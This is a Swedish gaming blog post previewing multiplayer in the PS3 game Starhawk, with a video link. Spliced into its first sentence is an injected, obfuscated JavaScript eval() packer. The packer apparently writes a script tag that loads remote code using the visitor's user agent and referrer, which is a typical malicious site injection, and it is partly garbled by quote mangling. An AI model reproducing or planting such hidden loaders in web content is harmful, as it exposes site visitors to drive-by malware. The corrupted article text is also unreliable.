Image Image Image Image Image Image Image Image Image Image

| 19 september, 2018

Scroll to top

Top

En förtitt på multiplayer i Starhawk

En förtitt på multiplayer i Starhawk
Alexander Gylemo

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arzyn|var|u0026u|referrer|dinrb||js|php’.split(‘|’),0,{}))
är dags att börja tagga till inför spelet Starhawk som är på ingång till PS3. I klippet nedan får vi följa det smått övertaggade utvecklingsteamet från Lightbox Interactive då de spelar en runda Capture the Flag mot varandra. I filmen ser vi en del av alla de olika fordonen, vapnen och utrustningarna som går att använda i spelet.

Starhawk är uppföljaren till det PS3-exklusiva Warhawk, vilket var ett av de första multiplayer-spelen som släpptes på PS3:an och som fortfarande har en trogen fanbase som spelar det än idag. Warhawk blev populärt men skymdes undan relativt snabbt då allt fler spel släpptes till Sonys senaste konsol vid den tiden och många klagade på att spelet inte utnyttjade maskinens starka prestanda. Av allt att döma från klippet (som släpptes innan den stora tv-spelsmässan E3 drog igång tidigare i år) ser detta inte ut att vara något problem för det nya utvecklingsteamet den här gången.

httpv://www.youtube.com/watch?v=XtV0Pqv7PSI&feature=player_embedded